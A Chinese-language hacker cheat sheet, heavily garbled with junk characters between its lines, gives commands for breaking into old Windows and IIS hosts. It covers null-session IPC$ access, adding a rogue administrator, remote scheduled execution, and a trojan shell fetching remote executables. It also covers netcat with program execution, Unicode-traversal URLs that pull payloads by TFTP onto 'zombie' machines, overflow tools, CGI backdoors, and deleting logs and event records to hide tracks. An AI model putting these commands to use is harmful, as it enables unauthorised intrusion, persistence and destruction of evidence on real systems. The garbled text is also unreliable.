网管和黑客都必须知道的命令
�&�*X3�c�h 常用的几条NET命令:
qPp1:a" ��
�Tbe_x�s^ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
cZ��PbD;e: c�jC�E3V9X (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
z�G&�WWc`K [�6Uud�i�w (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
QWU5-p9e8 ��_K
4eD�. (查看远程主机时间) net time \\IP地址
O�N:LPf>"- (k����7�;� (定时启动某个程序) at \\IP地址 02:18 readme.exe
L#�@l(8��. �{�KF�7j63 (查看共享) net view \\IP地址
e}{8a9J<%_ .�t"n]X� i (查看netbios工作组列表) nbtstat -A IP地址
>����l7eoj P&�qy.��0� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
I�@8+k&nXS �Y�t\E/*%� (这两条把自己增加到管理员组): net user 用户名 密码 /add
��YR$tP��e �% �<8K^|w net localgroup Administrators 用户名 /add
^h��Q:A4@q s4�\S�X,�� (断开连接) net use \\IP地址\ipc$ /delete
X7'h@>R��� w��xdh�?sQ 扫尾:
,apd�3X�%g q�$e
T!'x del C:\winnt\system32\logfiles\*.*
�$K=K?BV�[ �$#6�Fnhh} del C:\winnt\ssytem32\config\*.evt
BZ]&uD|f
�@�t{�{Q�1 del C:\winnt\system32\dtclog\*.*
�yVbg,q'?
?7r�mw�y\ del C:\winnt\system32\*.log
{�jj�]K�.& O�[i2A���( del C:\winnt\system32\*.txt
�Y?"v�2~;3 fY|�@{]r�x del C:\winnt\*.txt
��KUl
Zk^a , V0i�M��q del C:\winnt\*.log
K��8y�Wg\K TMnT#ypf<5 一、netsvc.exe
umq$4}T�'$ &4ug���3�� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
!?tu!
M<1? $i�1>?pb3� netsvc /list \\IP地址
Ax�G?zBTFx Y�/?DS�o4G netsvc schedule \\IP地址 /query
(hD X4�;4 e��8W�P��V netsvc \\IP地址 schedule /start
+lY\r �+�; :S��u��5�� 二、OpenTelnet.exe
�hr/xp�QW� �mI�_ 6�f~ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�B�1 jH.(� +i�Z@�.�LI OpenTelnet \\IP地址 用户名 密码 1 7878
UgOGBj,&5W p�n �~/!y� 然后就可以telnet到主机的7878端口,进入DOS方式下:
HQ�-N!pf9� �
RU3_�Fso telnet IP地址 7878
�"GIg�|�3� [4V|Uv�K�z 三、winshell.exe
V�NOK�>+� V�fJX<�e=k 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
J.CZR[XF# �zD#+[XI]K p Path (查看winshell主程序的路径信息)
f4@#pnJ3po RP��S�c�P� b reBoot (重新启动机器)
Q@3���ld6y AOv�H&�9** d shutDown (关闭机器)
Z.c�G`Km�* #U6/��@l�) s Shell (执行后你就会看到可爱的“C:\>”)
93zlfLS0�� g:@Cg�.q8 x eXit (退出本次登录会话,此命令并不终止winshell的运行)
|zr)h�C��
�A ydy=�sj CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�O�(c4iWm� {<Xo,U7��y 四、3389登陆器,GUI方式登录远程主机的
{kY`X[fvZ� !T&�u2=`�D 五、elsave.exe
_3F�MQY�(� V.E.~<�7D\ 事件日志清除工具
Q
�xj�|lr� �//4p��1^% elsave -s \\IP地址 -l "application" -C
`"bRj�C"f] B4M'�E�r{v elsave -s \\IP地址 -l "system" -C
E����P%
M8 Bt�`r6�v;\ elsave -s \\IP地址 -l "security" -C
/ab K/8ZQ
�E�`sapk 执行后成功清除应用程序日志,系统日志,安全日志
ej�??j�<]� G�%W0�3c�� 六、hbulot.exe
C�O6X�IgTe ���zL[��U; 开启win2kserver和winxp的3389服务
@N:3`��[oB U`vt/#j
�1 hbulot [/r]
:`�!mCW`Q- @Z1?�t%�1� 使用/r表示安装完成后自动重起目标使设置生效。
ua.�6�?W) �H~1?�MAX 七、nc.exe(netcat.exe)
\�C'�I l
w �16d{�IGMz 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�'D�B�({s� %�Tm'�aY�" 想要连接到某处: nc [-options] hostname port[s] [ports] ...
~�jrU#<'G9 ���y|2g�"J 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
i�R4,$Nn>� R.�n`R|NOd 参数:
m�SvTn�d8 nG(|�7x � -e prog 程序重定向,一旦连接,就执行 [危险!!]
�Xb07 l3UG R}=]UO�qH- -g gateway source-routing hop point[s], up to 8
m�<VL19o>R B+e~k?O]�1 -G num source-routing pointer: 4, 8, 12, ...
Lh5+fk~i~8 l<��+,(�E= -h 帮助信息
<P
Z\qE*+y _|2";��.1E -i secs 延时的间隔
�g�]hn@�{[ rO2��PbF�3 -l 监听模式,用于入站连接
�fe�]T9EDA ^dp[�Z,[1z -n 指定数字的IP地址,不能用hostname
j���l�?y}� =�K&�q;;h -o file 记录16进制的传输
&b#NF�1Q.� �i~M.F=I�5 -p port 本地端口号
D\i8r�qU/l �jind!@}!� -r 任意指定本地及远程端口
��rH9�|JEz {Ac3/U��M/ -s addr 本地源地址
Q�!$kUcky9 q?�b)ze�J� -u UDP模式
39^u��Lob ;�kcFQed\w -v 详细输出——用两个-v可得到更详细的内容
xd��Sj+507 Zp��P�6Q -w secs timeout的时间
l�VK�F^-i �,HjHt\!~< -z 将输入输出关掉——用于扫描时
/)HEx&SQmZ 八、TFTPD32.EXE
^SES'�)x�� ��m]b.P,~v 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
j�l�|�X�$w i�_Q4bhVj� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
r'�}k`A�5> P|Qn�Z){� 然后可以直接令文件运行:
W71#N�jM2Z _��a�02�# http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
"q�#g/�T yyYbB��]D 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
s</k�tPt�u Lw�78v@dY 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
dY�tt�se' 1 bx^P�t)� 一、一 Xscan命令行运行参数说明:
�O"w�_�sw M�DX�Qj5s^ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
` �G/QJH{I Vf�* �B1Zb 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
]4p�C\0��c �Y K�62#; xscan -file <主机列表文件名> <检测项目> [其他选项]
[;\<
2�=H� r4�q�V�}-E 其中<检测项目> 含义如下:
^��*�T{-U'
Xv;Z�A�a� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
D_`)T;<S�p >w'�?DV>u| -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
xo�@/k���� {hp�@�j#�� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
l=G�#gKE�� 'Rf�#1l�s# -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
T"jDq1C/,E qv >(����� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
!!Gi.VL�� 7UnO/K7oB. [其他选项] 含义如下:
v?iH}7zb%Q C�X�(yrP6; -v: 显示详细扫描进度
�:=�fH��PT 2t�TV5,(1� -p: 跳过Ping不通的主机
�yvnrZ&x�: a[OLS+zf!P -o: 跳过没有检测到开放端口的主机
����A�&|(% m_W.r+s~C4 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
